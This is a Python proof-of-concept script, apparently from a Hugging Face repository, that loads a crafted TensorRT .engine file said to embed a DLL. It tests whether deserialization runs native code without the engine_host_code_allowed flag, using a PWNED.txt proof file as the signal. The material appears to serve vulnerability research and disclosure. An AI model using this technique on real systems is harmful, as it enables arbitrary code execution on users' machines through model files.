# tensorrt-ace-poc-embedded-plugin / load_malicious_engine.py
# treforbenbow's picture
# Upload load_malicious_engine.py with huggingface_hub
# 201a578 verified
"""
TensorRT ACE PoC - Step 2: Load the malicious .engine file.
This script:
1. Reads the malicious .engine file (which contains an embedded DLL)
2. Creates a TensorRT runtime WITHOUT setting engine_host_code_allowed
3. Attempts to deserialize the engine
4. Checks if arbitrary code was executed (PWNED.txt created)
If the PWNED.txt file is created, it proves that TensorRT executed
arbitrary native code from the .engine file without any security gate.
"""
import os
import sys
import tensorrt as trt
def load_malicious_engine():
    """Deserialize the test engine and report whether the proof file appeared.

    The engine file ``malicious_model.engine`` and the proof file
    ``PWNED.txt`` are both looked up next to this script. Any stale proof
    file is deleted first so a leftover from an earlier run cannot be
    mistaken for a fresh result.

    The engine is first deserialized with a runtime whose
    ``engine_host_code_allowed`` attribute is left untouched. The proof file
    is checked immediately after that attempt. Only if that attempt returns
    ``None`` is a second runtime created with the flag explicitly set to
    ``True`` and deserialization retried; that retry is purely diagnostic
    and does not count towards the result.

    Returns:
        bool: ``True`` only if the proof file existed right after the first
        (flag untouched) deserialization attempt. ``False`` if the engine
        file is missing, if no proof file appeared, or if the proof file
        appeared only after the flag had been explicitly enabled.
    """
    script_dir = os.path.dirname(__file__)
    engine_file = os.path.join(script_dir, "malicious_model.engine")
    proof_file = os.path.join(script_dir, "PWNED.txt")

    if not os.path.exists(engine_file):
        print(f"ERROR: Engine file not found: {engine_file}")
        print("Run build_malicious_engine.py first")
        return False

    # Clean up any previous proof file
    if os.path.exists(proof_file):
        os.remove(proof_file)
        print("[*] Removed previous proof file")

    logger = trt.Logger(trt.Logger.VERBOSE)

    # Create runtime WITHOUT enabling engine_host_code_allowed
    runtime = trt.Runtime(logger)
    print("[*] Runtime created")
    print(f"[*] engine_host_code_allowed = {runtime.engine_host_code_allowed}")
    print("[*] NOTE: engine_host_code_allowed is FALSE (default)")

    # Read the engine file
    print(f"[*] Reading engine file: {engine_file}")
    with open(engine_file, "rb") as f:
        engine_data = f.read()
    print(f"[*] Engine data size: {len(engine_data)} bytes")

    # Attempt to deserialize - this is where ACE would occur
    print("[*] Attempting to deserialize engine...")
    print("[*] If a message box appears or PWNED.txt is created, ACE is confirmed!")
    engine = runtime.deserialize_cuda_engine(engine_data)

    # Snapshot the proof state BEFORE any retry. The retry below explicitly
    # enables engine_host_code_allowed, so a proof file created by it says
    # nothing about what happens with the flag left alone.
    triggered_without_flag = os.path.exists(proof_file)

    if engine is not None:
        print("[+] Engine deserialized successfully!")
    else:
        print("[-] Engine deserialization failed (returned None)")
        print("[*] This might mean engine_host_code_allowed blocked it")
        print("[*] Trying again WITH engine_host_code_allowed = True...")
        runtime2 = trt.Runtime(logger)
        runtime2.engine_host_code_allowed = True
        print(f"[*] engine_host_code_allowed = {runtime2.engine_host_code_allowed}")
        engine = runtime2.deserialize_cuda_engine(engine_data)
        if engine is not None:
            print("[+] Engine deserialized with flag enabled!")
        else:
            print("[-] Still failed. Plugin might have issues.")

    # Check for proof of ACE
    print(f"\n{'='*60}")
    if triggered_without_flag:
        print("[!!!] ARBITRARY CODE EXECUTION CONFIRMED!")
        print(f"[!!!] Proof file created: {proof_file}")
        with open(proof_file, "r") as f:
            print(f"[!!!] Contents: {f.read()}")
    elif os.path.exists(proof_file):
        # The file showed up only during the opted-in retry, so this run
        # does not demonstrate execution with the flag left untouched.
        print("[-] Proof file appeared only after engine_host_code_allowed was set to True")
        print("[-] Not counted: the first attempt (flag untouched) did not create it")
    else:
        print("[-] No proof file found - ACE did not trigger")
        print("[-] (Note: MessageBox might still have appeared)")
    print(f"{'='*60}")

    return triggered_without_flag
if __name__ == "__main__":
    # Map the boolean result onto a process exit status:
    # 0 when load_malicious_engine() returns a truthy value, 1 otherwise.
    exit_status = 0 if load_malicious_engine() else 1
    sys.exit(exit_status)